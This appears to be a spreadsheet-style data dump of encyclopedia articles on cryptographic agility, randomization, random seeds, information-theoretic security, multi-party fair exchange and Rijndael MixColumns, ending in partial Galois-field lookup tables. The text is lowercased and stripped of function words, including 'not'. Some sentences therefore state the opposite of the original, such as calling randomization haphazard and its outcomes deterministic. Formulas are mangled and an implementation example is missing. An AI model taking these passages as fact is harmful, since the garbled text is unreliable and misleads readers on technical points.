burnishing high-frequency impact treatment deep hole drilling (dhd) measurement technique hole drilling method references further reading hosford, william 2005. "residual stresses." mechanical behavior materials, 308–321. cambridge university press. isbn 978-0-521-84670-7 cary, howard scott helzer (2005). modern welding technology. upper saddle river, jersey: pearson education. isbn 0-13-113029-3. schajer, gary 2013. practical residual stress measurement methods. wiley. isbn 978-1-118-34237-4 kehl, j.-h., drafz, pape, poll, 2016. simulative investigations influence surface indentations residual stresses inner raceways roller element bearings, international conference residual stresses 2016 (sydney), doi: 10.21741/9781945291173-69 external links energy-saving technology computerized equipment vibration stabilization residual stress (the 35-year-old scientific school, presented 1988, world's first installation computer diagnostics) intended stabilize residual stresses welds, castings non-rigid dynamic metal comprehensive resources residual stresses cambridge university</t>
  </si>
  <si>
    <t>Cryptographic agility</t>
  </si>
  <si>
    <t>cryptographic agility (also referred crypto-agility) practice paradigm designing information security protocols standards support multiple cryptographic primitives algorithms time. then systems implementing particular standard choose combination primitives want use. primary goal cryptographic agility enable rapid adaptations cryptographic primitives algorithms without making disruptive changes systems' infrastructure. cryptographic agility acts safety measure incident response mechanism cryptographic primitive system discovered vulnerable. security system considered crypto agile cryptographic algorithms parameters replaced ease least partly automated. impending arrival quantum computer break existing asymmetric cryptography raising awareness importance cryptographic agility. example x.509 public certificate illustrates crypto-agility. public certificate cryptographic parameters including type, length, hash algorithm. x.509 version v.3, type rsa, 1024-bit length, sha-1 hash algorithm found nist length made vulnerable attacks, thus prompting transition sha-2. importance with rise secure transport layer communication 1990s, cryptographic primitives algorithms increasingly popular; example, 2019 website employed form security measures. furthermore, cryptographic techniques widely incorporated protect applications business transactions. however, cryptographic algorithms deployed, researching security intensifies, attacks cryptographic primitives (old alike) discovered short intervals. crypto-agility tries tackle implied threat information security allowing swift deprecation vulnerable primitives replacement ones. this threat merely theoretical; many algorithms considered secure (des, rsa, rc4) known vulnerable, even amateur attackers. hand, algorithms (aes, elliptic curve cryptography) often secure faster comparison ones. systems designed meet crypto-agility criteria expected less affected current primitives found vulnerable, enjoy better latency battery usage using improved primitives. example, quantum computing, feasible, expected able defeat existing public cryptography algorithms. overwhelming majority existing public infrastructure rely computational hardness problems large integer factorization discrete logarithm problems (which includes elliptic-curve cryptography special case). quantum computers running shor's algorithm solve problems exponentially faster best known algorithms conventional computers. post-quantum cryptography subfield cryptography aims replace algorithms broken ones believed hard break even quantum computer. main families post-quantum alternatives factoring discrete logarithm include lattice-based cryptography, multivariate cryptography, hash-based cryptography code-based cryptography. awareness system evolution crypto-agility same. system evolution progresses basis emerging business technical requirements. crypto-agility related instead computing infrastructure requires consideration security experts, system designers application developers. best practices best practices dealing crypto-agility include: business applications involving sort cryptographic technology incorporate latest algorithms techniques. crypto-agility requirements must disseminated hardware, software service suppliers, must comply timely basis; suppliers cannot address requirements must replaced. suppliers must provide timely updates identify crypto technology employ. quantum-resistant solutions taken mind. symmetric-key algorithm flexible lengths. hash algorithms support different lengths outputs. digital certificate private rotations must automated. comply standards regulations. names algorithms used communicated assumed defaulted. references</t>
  </si>
  <si>
    <t>Randomization</t>
  </si>
  <si>
    <t>randomization process making something random; various contexts involves, example: generating random permutation sequence (such shuffling cards); selecting random sample population (important statistical sampling); allocating experimental units random assignment treatment control condition; generating random numbers (random number generation); transforming data stream (such using scrambler telecommunications).randomization haphazard; instead, random process sequence random variables describing process whose outcomes follow deterministic pattern, follow evolution described probability distributions. example, random sample individuals population refers sample every individual known probability sampled. this would contrasted nonprobability sampling arbitrary individuals selected. applications randomization used statistics gambling. statistics randomization core principle statistical theory, whose importance emphasized charles peirce "illustrations logic science" (1877–1878) theory probable inference" (1883). randomization-based inference especially important experimental design survey sampling. first "randomization" listed oxford english dictionary ronald fisher 1926. randomized experiments statistical theory design experiments, randomization involves randomly allocating experimental units across treatment groups. example, experiment compares drug standard drug, patients allocated either drug standard drug control using randomization. randomization reduces confounding equalising so-called factors independent variables) accounted experimental design. survey sampling survey sampling uses randomization, following criticisms previous "representative methods" jerzy neyman 1922 report international statistical institute. resampling some important methods statistical inference resampling observed data. multiple alternative versions data-set "might observed" created randomization original data-set, observed. variation statistics calculated alternative data-sets guide uncertainty statistics estimated original data. gambling randomization used extensively field gambling. because poor randomization allow skilled gambler take advantage, much research devoted effective randomization. classic example randomizing shuffling playing cards. techniques although historically "manual" randomization techniques (such shuffling cards, drawing pieces paper bag, spinning roulette wheel) common, nowadays automated techniques mostly used. selecting random samples random permutations reduced simply selecting random numbers, random number generation methods commonly used, hardware random number generators pseudo-random number generators. optimization randomization used optimization alleviate computational burden associated robust control techniques: sample values uncertainty parameters randomly drawn robustness enforced values only. this approach gained popularity introduction rigorous theories permit control probabilistic level robustness, scenario optimization. non-algorithmic randomization methods include: casting yarrow stalks (for ching) throwing dice flipping coin drawing straws shuffling cards roulette wheels drawing pieces paper balls "lottery machines" observing atomic decay using radiation counter also randomized algorithm references external links rqube generate quasi-random stimulus sequences experimental designs randlist randomization list generator</t>
  </si>
  <si>
    <t>Random seed</t>
  </si>
  <si>
    <t>random seed seed state, seed) number vector) used initialize pseudorandom number generator. seed used pseudorandom number generator, need random. because nature number generating algorithms, long original seed ignored, rest values algorithm generates follow probability distribution pseudorandom manner. pseudorandom number generator's number sequence completely determined seed: thus, pseudorandom number generator reinitialized seed, produce sequence numbers. choice good random seed crucial field computer security. when secret encryption pseudorandomly generated, seed allow obtain key. high entropy important selecting good random seed data.if random seed deliberately shared, becomes secret key, systems using matching pseudorandom number algorithms matching seeds generate matching sequences non-repeating numbers used synchronize remote systems, satellites receivers. random seeds often generated state computer system (such time), cryptographically secure pseudorandom number generator hardware random number generator. also salt (cryptography) pseudorandomness cryptographic nonce initialization vector references</t>
  </si>
  <si>
    <t>Information-theoretic security</t>
  </si>
  <si>
    <t>cryptosystem considered information-theoretic security (also called unconditional security) system secure adversaries unlimited computing resources time. contrast, system depends computational cost cryptanalysis secure (and thus broken attack unlimited computation) called computationally, conditionally, secure. overview encryption protocol information-theoretic security impossible break even infinite computational power. protocols proven information-theoretically secure resistant future developments computing. concept information-theoretically secure communication introduced 1949 american mathematician claude shannon, founders classical information theory, used prove one-time system secure. information-theoretically secure cryptosystems used sensitive governmental communications, diplomatic cables high-level military communications. there variety cryptographic tasks information-theoretic security meaningful useful requirement. are: secret sharing schemes shamir's information-theoretically secure (and also perfectly secure) less requisite number shares secret provides information secret. more generally, secure multiparty computation protocols often information-theoretic security. private information retrieval multiple databases achieved information-theoretic privacy user's query. reductions cryptographic primitives tasks often achieved information-theoretically. such reductions important theoretical perspective establish primitive {\displaystyle realized primitive {\displaystyle realized. symmetric encryption constructed information-theoretic notion security called entropic security, assumes adversary knows almost nothing message sent. goal hide functions plaintext rather information information-theoretic cryptography quantum-safe. physical layer encryption technical limitations algorithms computationally conditionally secure (i.e., information-theoretic secure) dependent resource limits. example, relies assertion factoring large numbers hard. weaker notion security, defined aaron wyner, established now-flourishing area research known physical layer encryption. exploits physical wireless channel security communications, signal processing, coding techniques. security provable, unbreakable, quantifiable bits/second/hertz). wyner's initial physical layer encryption work 1970s posed alice–bob–eve problem alice wants send message without decoding channel alice statistically better channel alice eve, shown secure communication possible. that intuitive, wyner measured secrecy information theoretic terms defining secrecy capacity, essentially rate alice transmit secret information bob. shortly afterward, imre csiszár körner showed secret communication possible even statistically better channel alice did. basic idea information theoretic approach securely transmit confidential messages (without using encryption key) legitimate receiver inherent randomness physical medium (including noises channel fluctuations fading) exploit difference channel legitimate receiver channel eavesdropper benefit legitimate receiver. more recent theoretical results concerned determining secrecy capacity optimal power allocation broadcast fading channels. there caveats, many capacities computable unless assumption made alice knows channel eve. known, alice could simply place null eve's direction. secrecy capacity mimo multiple colluding eavesdroppers recent ongoing work, results still make non-useful assumption eavesdropper channel state information knowledge. still work less theoretical attempting compare implementable schemes. physical layer encryption scheme broadcast artificial noise directions except bob's channel, basically jams eve. paper negi goel details implementation, khisti wornell computed secrecy capacity statistics eve's channel known.parallel work information theory community work antenna community, termed near-field direct antenna modulation directional modulation. shown using parasitic array, transmitted modulation different directions could controlled independently. secrecy could realized making modulations undesired directions difficult decode. directional modulation data transmission experimentally demonstrated using phased array. others demonstrated directional modulation switched arrays phase-conjugating lenses.that type directional modulation really subset negi goel's additive artificial noise encryption scheme. another scheme using pattern-reconfigurable transmit antennas alice called reconfigurable multiplicative noise (rmn) complements additive artificial noise. work well together channel simulations nothing assumed known alice eavesdroppers. secret agreement different works mentioned previous part employ, another, randomness present wireless channel transmit information-theoretically secure messages. conversely, could analyze much secrecy extract randomness form secret key. that goal secret agreement. line work, started maurer ahlswede csiszár, basic system model removes restriction communication schemes assumes legitimate users communicate two-way, public, noiseless, authenticated channel cost. this model subsequently extended account multiple users noisy channel among others. also leftover hash lemma (privacy amplification) semantic security references</t>
  </si>
  <si>
    <t>Multi-party fair exchange protocol</t>
  </si>
  <si>
    <t>cryptography, multi-party fair exchange protocol protocol parties accept deliver item receive item return. definition matthew franklin gene tsudik suggested 1998 following classification: {\displaystyle -party single-unit general exchange permutation {\displaystyle \sigma 1... {\displaystyle \{1...n\}} party {\displaystyle p_{i}} offers single unit commodity {\displaystyle k_{i}} {\displaystyle p_{\sigma (i)}} receives single unit commodity {\displaystyle k_{\sigma ^{-1}(i)}} {\displaystyle p_{\sigma ^{-1}(i)}} {\displaystyle -party multi-unit general exchange matrix baskets, entry {\displaystyle b_{ij}} {\displaystyle column {\displaystyle basket goods given {\displaystyle p_{i}} {\displaystyle p_{j}} also secure multi-party computation references</t>
  </si>
  <si>
    <t>Rijndael MixColumns</t>
  </si>
  <si>
    <t>mixcolumns operation performed rijndael cipher, along shiftrows step, primary source diffusion rijndael. each column treated four-term polynomial {\displaystyle b(x)=b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}} elements within field {\displaystyle \operatorname {gf} (2^{8})} coefficients polynomials elements within prime sub-field {\displaystyle \operatorname {gf} (2)} each column multiplied fixed polynomial {\displaystyle a(x)=3x^{3}+x^{2}+x+2} modulo {\displaystyle x^{4}+1} inverse polynomial {\displaystyle a^{-1}(x)=11x^{3}+13x^{2}+9x+14} mixcolumns operation consists modular multiplication four-term polynomials whose coefficients elements {\displaystyle \operatorname {gf} \left(2^{8}\right)} modulus used operation {\displaystyle x^{4}+1} first four-term polynomial coefficients defined state column {\displaystyle {\begin{bmatrix}b_{3}&amp;b_{2}&amp;b_{1}&amp;b_{0}\end{bmatrix}}} contains four bytes. each byte coefficient four-term {\displaystyle b(x)=b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}.} second four-term polynomial constant polynomial {\displaystyle a(x)=3x^{3}+x^{2}+x+2} coefficients also elements {\displaystyle \operatorname {gf} \left(2^{8}\right)} inverse {\displaystyle a^{-1}(x)=11x^{3}+13x^{2}+9x+14} need define notation: {\displaystyle \otimes denotes multiplication modulo {\displaystyle x^{4}+1} {\displaystyle \oplus denotes addition {\displaystyle \operatorname {gf} \left(2^{8}\right)} {\displaystyle \bullet denotes multiplication (usual polynomial multiplication polynomials multiplication {\displaystyle \operatorname {gf} \left(2^{8}\right)} coefficients). multiplication section finite field arithmetic explanation simple multiplication.the addition polynomials whose coefficients elements {\displaystyle \operatorname {gf} \left(2^{8}\right)} following rule: {\displaystyle {\begin{aligned}&amp;\left(a_{3}x^{3}+a_{2}x^{2}+a_{1}x+a_{0}\right)+\left(b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}\right)\\={}&amp;\left(a_{3}\oplus b_{3}\right)x^{3}+\left(a_{2}\oplus b_{2}\right)x^{2}+\left(a_{1}\oplus b_{1}\right)x+\left(a_{0}\oplus b_{0}\right)\end{aligned}}} demonstration polynomial {\displaystyle a(x)=3x^{3}+x^{2}+x+2} expressed {\displaystyle a(x)=a_{3}x^{3}+a_{2}x^{2}+a_{1}x+a_{0}} polynomial multiplication {\displaystyle {\begin{aligned}a(x)\bullet b(x)=c(x)&amp;=\left(a_{3}x^{3}+a_{2}x^{2}+a_{1}x+a_{0}\right)\bullet \left(b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}\right)\\&amp;=c_{6}x^{6}+c_{5}x^{5}+c_{4}x^{4}+c_{3}x^{3}+c_{2}x^{2}+c_{1}x+c_{0}\end{aligned}}} where: {\displaystyle {\begin{aligned}c_{0}&amp;=a_{0}\bullet b_{0}\\c_{1}&amp;=a_{1}\bullet b_{0}\oplus a_{0}\bullet b_{1}\\c_{2}&amp;=a_{2}\bullet b_{0}\oplus a_{1}\bullet b_{1}\oplus a_{0}\bullet b_{2}\\c_{3}&amp;=a_{3}\bullet b_{0}\oplus a_{2}\bullet b_{1}\oplus a_{1}\bullet b_{2}\oplus a_{0}\bullet b_{3}\\c_{4}&amp;=a_{3}\bullet b_{1}\oplus a_{2}\bullet b_{2}\oplus a_{1}\bullet b_{3}\\c_{5}&amp;=a_{3}\bullet b_{2}\oplus a_{2}\bullet b_{3}\\c_{6}&amp;=a_{3}\bullet b_{3}\end{aligned}}} modular reduction result {\displaystyle c(x)} seven-term polynomial, must reduced four-byte word, done multiplication modulo {\displaystyle x^{4}+1} basic polynomial modular operations that: {\displaystyle {\begin{aligned}x^{6}{\bmod {\left(x^{4}+1\right)}}&amp;=-x^{2}=x^{2}{\text{ }}\operatorname {gf} \left(2^{8}\right)\\x^{5}{\bmod {\left(x^{4}+1\right)}}&amp;=-x=x{\text{ }}\operatorname {gf} \left(2^{8}\right)\\x^{4}{\bmod {\left(x^{4}+1\right)}}&amp;=-1=1{\text{ }}\operatorname {gf} \left(2^{8}\right)\end{aligned}}} general, {\displaystyle x^{i}{\bmod {\left(x^{4}+1\right)}}=x^{i{\bmod {4}}}.} {\displaystyle {\begin{aligned}a(x)\otimes b(x)&amp;=c(x){\bmod {\left(x^{4}+1\right)}}\\&amp;=\left(c_{6}x^{6}+c_{5}x^{5}+c_{4}x^{4}+c_{3}x^{3}+c_{2}x^{2}+c_{1}x+c_{0}\right){\bmod {\left(x^{4}+1\right)}}\\&amp;=c_{6}x^{6{\bmod {4}}}+c_{5}x^{5{\bmod {4}}}+c_{4}x^{4{\bmod {4}}}+c_{3}x^{3{\bmod {4}}}+c_{2}x^{2{\bmod {4}}}+c_{1}x^{1{\bmod {4}}}+c_{0}x^{0{\bmod {4}}}\\&amp;=c_{6}x^{2}+c_{5}x+c_{4}+c_{3}x^{3}+c_{2}x^{2}+c_{1}x+c_{0}\\&amp;=c_{3}x^{3}+\left(c_{2}\oplus c_{6}\right)x^{2}+\left(c_{1}\oplus c_{5}\right)x+c_{0}\oplus c_{4}\\&amp;=d_{3}x^{3}+d_{2}x^{2}+d_{1}x+d_{0}\end{aligned}}} {\displaystyle d_{0}=c_{0}\oplus c_{4}} {\displaystyle d_{1}=c_{1}\oplus c_{5}} {\displaystyle d_{2}=c_{2}\oplus c_{6}} {\displaystyle d_{3}=c_{3}} matrix representation coefficient {\displaystyle d_{3}} {\displaystyle d_{2}} {\displaystyle d_{1}} {\displaystyle d_{0}} also expressed follows: {\displaystyle d_{0}=a_{0}\bullet b_{0}\oplus a_{3}\bullet b_{1}\oplus a_{2}\bullet b_{2}\oplus a_{1}\bullet b_{3}} {\displaystyle d_{1}=a_{1}\bullet b_{0}\oplus a_{0}\bullet b_{1}\oplus a_{3}\bullet b_{2}\oplus a_{2}\bullet b_{3}} {\displaystyle d_{2}=a_{2}\bullet b_{0}\oplus a_{1}\bullet b_{1}\oplus a_{0}\bullet b_{2}\oplus a_{3}\bullet b_{3}} {\displaystyle d_{3}=a_{3}\bullet b_{0}\oplus a_{2}\bullet b_{1}\oplus a_{1}\bullet b_{2}\oplus a_{0}\bullet b_{3}} replace coefficients {\displaystyle a(x)} constants {\displaystyle {\begin{bmatrix}3&amp;1&amp;1&amp;2\end{bmatrix}}} used cipher obtain following: {\displaystyle d_{0}=2\bullet b_{0}\oplus 3\bullet b_{1}\oplus 1\bullet b_{2}\oplus 1\bullet b_{3}} {\displaystyle d_{1}=1\bullet b_{0}\oplus 2\bullet b_{1}\oplus 3\bullet b_{2}\oplus 1\bullet b_{3}} {\displaystyle d_{2}=1\bullet b_{0}\oplus 1\bullet b_{1}\oplus 2\bullet b_{2}\oplus 3\bullet b_{3}} {\displaystyle d_{3}=3\bullet b_{0}\oplus 1\bullet b_{1}\oplus 1\bullet b_{2}\oplus 2\bullet b_{3}} this demonstrates operation similar hill cipher. performed multiplying coordinate vector four numbers rijndael's galois field following circulant matrix: {\displaystyle {\begin{bmatrix}d_{0}\\d_{1}\\d_{2}\\d_{3}\end{bmatrix}}={\begin{bmatrix}2&amp;3&amp;1&amp;1\\1&amp;2&amp;3&amp;1\\1&amp;1&amp;2&amp;3\\3&amp;1&amp;1&amp;2\end{bmatrix}}{\begin{bmatrix}b_{0}\\b_{1}\\b_{2}\\b_{3}\end{bmatrix}}} implementation example this simplified somewhat actual implementation replacing multiply single shift conditional exclusive replacing multiply multiply combined exclusive example implementation follows: example test vectors mixcolumn() inversemixcolumns mixcolumns operation following inverse (numbers decimal): {\displaystyle {\begin{bmatrix}b_{0}\\b_{1}\\b_{2}\\b_{3}\end{bmatrix}}={\begin{bmatrix}14&amp;11&amp;13&amp;9\\9&amp;14&amp;11&amp;13\\13&amp;9&amp;14&amp;11\\11&amp;13&amp;9&amp;14\end{bmatrix}}{\begin{bmatrix}d_{0}\\d_{1}\\d_{2}\\d_{3}\end{bmatrix}}} {\displaystyle {\begin{aligned}b_{0}&amp;=14\bullet d_{0}\oplus 11\bullet d_{1}\oplus 13\bullet d_{2}\oplus 9\bullet d_{3}\\b_{1}&amp;=9\bullet d_{0}\oplus 14\bullet d_{1}\oplus 11\bullet d_{2}\oplus 13\bullet d_{3}\\b_{2}&amp;=13\bullet d_{0}\oplus 9\bullet d_{1}\oplus 14\bullet d_{2}\oplus 11\bullet d_{3}\\b_{3}&amp;=11\bullet d_{0}\oplus 13\bullet d_{1}\oplus 9\bullet d_{2}\oplus 14\bullet d_{3}\end{aligned}}} galois multiplication lookup tables commonly, rather implementing galois multiplication, rijndael implementations simply pre-calculated lookup tables perform byte multiplication instance, tables stored byte[256] arrays. order compute result obtained way: result table_3[(int)p] some common instances lookup tables follows: multiply 0x00,0x02,0x04,0x06,0x08,0x0a,0x0c,0x0e,0x10,0x12,0x14,0x16,0x18,0x1a,0x1c,0x1e, 0x20,0x22,0x24,0x26,0x28,0x2a,0x2c,0x2e,0x30,0x32,0x34,0x36,0x38,0x3a,0x3c,0x3e, 0x40,0x42,0x44,0x46,0x48,0x4a,0x4c,0x4e,0x50,0x52,0x54,0x56,0x58,0x5a,0x5c,0x5e, 0x60,0x62,0x64,0x66,0x68,0x6a,0x6c,0x6e,0x70,0x72,0x74,0x76,0x78,0x7a,0x7c,0x7e, 0x80,0x82,0x84,0x86,0x88,0x8a,0x8c,0x8e,0x90,0x92,0x94,0x96,0x98,0x9a,0x9c,0x9e, 0xa0,0xa2,0xa4,0xa6,0xa8,0xaa,0xac,0xae,0xb0,0xb2,0xb4,0xb6,0xb8,0xba,0xbc,0xbe, 0xc0,0xc2,0xc4,0xc6,0xc8,0xca,0xcc,0xce,0xd0,0xd2,0xd4,0xd6,0xd8,0xda,0xdc,0xde, 0xe0,0xe2,0xe4,0xe6,0xe8,0xea,0xec,0xee,0xf0,0xf2,0xf4,0xf6,0xf8,0xfa,0xfc,0xfe, 0x1b,0x19,0x1f,0x1d,0x13,0x11,0x17,0x15,0x0b,0x09,0x0f,0x0d,0x03,0x01,0x07,0x05, 0x3b,0x39,0x3f,0x3d,0x33,0x31,0x37,0x35,0x2b,0x29,0x2f,0x2d,0x23,0x21,0x27,0x25, 0x5b,0x59,0x5f,0x5d,0x53,0x51,0x57,0x55,0x4b,0x49,0x4f,0x4d,0x43,0x41,0x47,0x45, 0x7b,0x79,0x7f,0x7d,0x73,0x71,0x77,0x75,0x6b,0x69,0x6f,0x6d,0x63,0x61,0x67,0x65, 0x9b,0x99,0x9f,0x9d,0x93,0x91,0x97,0x95,0x8b,0x89,0x8f,0x8d,0x83,0x81,0x87,0x85, 0xbb,0xb9,0xbf,0xbd,0xb3,0xb1,0xb7,0xb5,0xab,0xa9,0xaf,0xad,0xa3,0xa1,0xa7,0xa5, 0xdb,0xd9,0xdf,0xdd,0xd3,0xd1,0xd7,0xd5,0xcb,0xc9,0xcf,0xcd,0xc3,0xc1,0xc7,0xc5, 0xfb,0xf9,0xff,0xfd,0xf3,0xf1,0xf7,0xf5,0xeb,0xe9,0xef,0xed,0xe3,0xe1,0xe7,0xe5 multiply 0x00,0x03,0x06,0x05,0x0c,0x0f,0x0a,0x09,0x18,0x1b,0x1e,0x1d,0x14,0x17,0x12,0x11, 0x30,0x33,0x36,0x35,0x3c,0x3f,0x3a,0x39,0x28,0x2b,0x2e,0x2d,0x24,0x27,0x22,0x21, 0x60,0x63,0x66,0x65,0x6c,0x6f,0x6a,0x69,0x78,0x7b,0x7e,0x7d,0x74,0x77,0x72,0x71, 0x50,0x53,0x56,0x55,0x5c,0x5f,0x5a,0x59,0x48,0x4b,0x4e,0x4d,0x44,0x47,0x42,0x41, 0xc0,0xc3,0xc6,0xc5,0xcc,0xcf,0xca,0xc9,0xd8,0xdb,0xde,0xdd,0xd4,0xd7,0xd2,0xd1, 0xf0,0xf3,0xf6,0xf5,0xfc,0xff,0xfa,0xf9,0xe8,0xeb,0xee,0xed,0xe4,0xe7,0xe2,0xe1, 0xa0,0xa3,0xa6,0xa5,0xac,0xaf,0xaa,0xa9,0xb8,0xbb,0xbe,0xbd,0xb4,0xb7,0xb2,0xb1, 0x90,0x93,0x96,0x95,0x9c,0x9f,0x9a,0x99,0x88,0x8b,0x8e,0x8d,0x84,0x87,0x82,0x81, 0x9b,0x98,0x9d,0x9e,0x97,0x94,0x91,0x92,0x83,0x80,0x85,0x86,0x8f,0x8c,0x89,0x8a, 0xab,0xa8,0xad,0xae,0xa7,0xa4,0xa1,0xa2,0xb3,0xb0,0xb5,0xb6,0xbf,0xbc,0xb9,0xba, 0xfb,0xf8,0xfd,0xfe,0xf7,0xf4,0xf1,0xf2,0xe3,0xe0,0xe5,0xe6,0xef,0xec,0xe9,0xea, 0xcb,0xc8,0xcd,0xce,0xc7,0xc4,0xc1,0xc2,0xd3,0xd0,0xd5,0xd6,0xdf,0xdc,0xd9,0xda, 0x5b,0x58,0x5d,0x5e,0x57,0x54,0x51,0x52,0x43,0x40,0x45,0x46,0x4f,0x4c,0x49,0x4a, 0x6b,0x68,0x6d,0x6e,0x67,0x64,0x61,0x62,0x73,0x70,0x75,0x76,0x7f,0x7c,0x79,0x7a, 0x3b,0x38,0x3d,0x3e,0x37,0x34,0x31,0x32,0x23,0x20,0x25,0x26,0x2f,0x2c,0x29,0x2a, 0x0b,0x08,0x0d,0x0e,0x07,0x04,0x01,0x02,0x13,0x10,0x15,0x16,0x1f,0x1c,0x19,0x1a multiply 0x00,0x09,0x12,0x1b,0x24,0x2d,0x36,0x3f,0x48,0x41,0x5a,0x53,0x6c,0x65,0x7e,0x77, 0x90,0x99,0x82,0x8b,0xb4,0xbd,0xa6,0xaf,0xd8,0xd1,0xca,0xc3,0xfc,0xf5,0xee,0xe7, 0x3b,0x32,0x29,0x20,0x1f,0x16,0x0d,0x04,0x73,0x7a,0x61,0x68,0x57,0x5e,0x45,0x4c, 0xab,0xa2,0xb9,0xb0,0x8f,0x86,0x9d,0x94,0xe3,0xea,0xf1,0xf8,0xc7,0xce,0xd5,0xdc, 0x76,0x7f,0x64,0x6d,0x52,0x5b,0x40,0x49,0x3e,0x37,0x2c,0x25,0x1a,0x13,0x08,0x01, 0xe6,0xef,0xf4,0xfd,0xc2,0xcb,0xd0,0xd9,0xae,0xa7,0xbc,0xb5,0x8a,0x83,0x98,0x91, 0x4d,0x44,0x5f,0x56,0x69,0x60,0x7b,0x72,0x05,0x0c,0x17,0x1e,0x21,0x28,0x33,0x3a, 0xdd,0xd4,0xcf,0xc6,0xf9,0xf0,0xeb,0xe2,0x95,0x9c,0x87,0x8e,0xb1,0xb8,0xa3,0xaa, 0xec,0xe5,0xfe,0xf7,0xc8,0xc1,0xda,0xd3,0xa4,0xad,0xb6,0xbf,0x80,0x89,0x92,0x9b, 0x7c,0x75,0x6e,0x67,0x58,0x51,0x4a,0x43,0x34,0x3d,0x26,0x2f,0x10,0x19,0x02,0x0b, 0xd7,0xde,0xc5,0xcc,0xf3,0xfa,0xe1,0xe8,0x9f,0x96,0x8d,0x84,0xbb,0xb2,0xa9,0xa0, 0x47,0x4e,0x55,0x5c,0x63,0x6a,0x71,0x78,0x0f,0x06,0x1d,0x14,0x2b,0x22,0x39,0x30, 0x9a,0x93,0x88,0x81,0xbe,0xb7,0xac,0xa5,0xd2,0xdb,0xc0,0xc9,0xf6,0xff,0xe4,0xed, 0x0a,0x03,0x18,0x11,0x2e,0x27,0x3c,0x35,0x42,0x4b,0x50,0x59,0x66,0x6f,0x74,0x7d, 0xa1,0xa8,0xb3,0xba,0x85,0x8c,0x97,0x9e,0xe9,0xe0,0xfb,0xf2,0xcd,0xc4,0xdf,0xd6, 0x31,0x38,0x23,0x2a,0x15,0x1c,0x07,0x0e,0x79,0x70,0x6b,0x62,0x5d,0x54,0x4f,0x46 multiply (0xb): 0x00,0x0b,0x16,0x1d,0x2c,0x27,0x3a,0x31,0x58,0x53,0x4e,0x45,0x74,0x7f,0x62,0x69, 0xb0,0xbb,0xa6,0xad,0x9c,0x97,0x8a,0x81,0xe8,0xe3,0xfe,0xf5,0xc4,0xcf,0xd2,0xd9, 0x7b,0x70,0x6d,0x66,0x57,0x5c,0x41,0x4a,0x23,0x28,0x35,0x3e,0x0f,0x04,0x19,0x12, 0xcb,0xc0,0xdd,0xd6,0xe7,0xec,0xf1,0xfa,0x93,0x98,0x85,0x8e,0xbf,0xb4,0xa9,0xa2, 0xf6,0xfd,0xe0,0xeb,0xda,0xd1,0xcc,0xc7,0xae,0xa5,0xb8,0xb3,0x82,0x89,0x94,0x9f, 0x46,0x4d,0x50,0x5b,0x6a,0x61,0x7c,0x77,0x1e,0x15,0x08,0x03,0x32,0x39,0x24,0x2f, 0x8d,0x86,0x9b,0x90,0xa1,0xaa,0xb7,0xbc,0xd5,0xde,0xc3,0xc8,0xf9,0xf2,0xef,0xe4, 0x3d,0x36,0x2b,0x20,0x11,0x1a,0x07,0x0c,0x65,0x6e,0x73,0x78,0x49,0x42,0x5f,0x54, 0xf7,0xfc,0xe1,0xea,0xdb,0xd0,0xcd,0xc6,0xaf,0xa4,0xb9,0xb2,0x83,0x88,0x95,0x9e, 0x47,0x4c,0x51,0x5a,0x6b,0x60,0x7d,0x76,0x1f,0x14,0x09,0x02,0x33,0x38,0x25,0x2e, 0x8c,0x87,0x9a,0x91,0xa0,0xab,0xb6,0xbd,0xd4,0xdf,0xc2,0xc9,0xf8,0xf3,0xee,0xe5, 0x3c,0x37,0x2a,0x21,0x10,0x1b,0x06,0x0d,0x64,0x6f,0x72,0x79,0x48,0x43,0x5e,0x55, 0x01,0x0a,0x17,0x1c,0x2d,0x26,0x3b,0x30,0x59,0x52,0x4f,0x44,0x75,0x7e,0x63,0x68, 0xb1,0xba,0xa7,0xac,0x9d,0x96,0x8b,0x80,0xe9,0xe2,0xff,0xf4,0xc5,0xce,0xd3,0xd8, 0x7a,0x71,0x6c,0x67,0x56,0x5d,0x40,0x4b,0x22,0x29,0x34,0x3f,0x0e,0x05,0x18,0x13, 0xca,0xc1,0xdc,0xd7,0xe6,0xed,0xf0,0xfb,0x92,0x99,0x84,0x8f,0xbe,0xb5,0xa8,0xa3 multiply (0xd): 0x00,0x0d,0x1a,0x17,0x34,0x39,0x2e,0x23,0x68,0x65,0x72,0x7f,0x5c,0x51,0x46,0x4b, 0xd0,0xdd,0xca,0xc7,0xe4,0xe9,0xfe,0xf3,0xb8,0xb5,0xa2,0xaf,0x8c,0x81,0x96,0x9b, 0xbb,0xb6,0xa1,0xac,0x8f,0x82,0x95,0x98,0xd3,0xde,0xc9,0xc4,0xe7,0xea,0xfd,0xf0, 0x6b,0x66,0x71,0x7c,0x5f,0x52,0x45,0x48,0x03,0x0e,0x19,0x14,0x37,0x3a,0x2d,0x20, 0x6d,0x60,0x77,0x7a,0x59,0x54,0x43,0x4e,0x05,0x08,0x1f,0x12,0x31,0x3c,0x2b,0x26, 0xbd,0xb0,0xa7,0xaa,0x89,0x84,0x93,0x9e,0xd5,0xd8,0xcf,0xc2,0xe1,0xec,0xfb,0xf6, 0xd6,0xdb,0xcc,0xc1,0xe2,0xef,0xf8,0xf5,0xbe,0xb3,0xa4,0xa9,0x8a,0x87,0x90,0x9d, 0x06,0x0b,0x1c,0x11,0x32,0x3f,0x28,0x25,0x6e,0x63,0x74,0x79,0x5a,0x57,0x40,0x4d, 0xda,0xd7,0xc0,0xcd,0xee,0xe3,0xf4,0xf9,0xb2,0xbf,0xa8,0xa5,0x86,0x8b,0x9c,0x91, 0x0a,0x07,0x10,0x1d,0x3e,0x33,0x24,0x29,0x62,0x6f,0x78,0x75,0x56,0x5b,0x4c,0x41, 0x61,0x6c,0x7b,0x76,0x55,0x58,0x4f,0x42,0x09,0x04,0x13,0x1e,0x3d,0x30,0x27,0x2a, 0xb1,0xbc,0xab,0xa6,0x85,0x88,0x9f,0x92,0xd9,0xd4,0xc3,0xce,0xed,0xe0,0xf7,0xfa, 0xb7,0xba,0xad,0xa0,0x83,0x8e,0x99,0x94,0xdf,0xd2,0xc5,0xc8,0xeb,0xe6,0xf1,0xfc, 0x67,0x6a,0x7d,0x70,0x53,0x5e,0x49,0x44,0x0f,0x02,0x15,0x18,0x3b,0x36,0x21,0x2c, 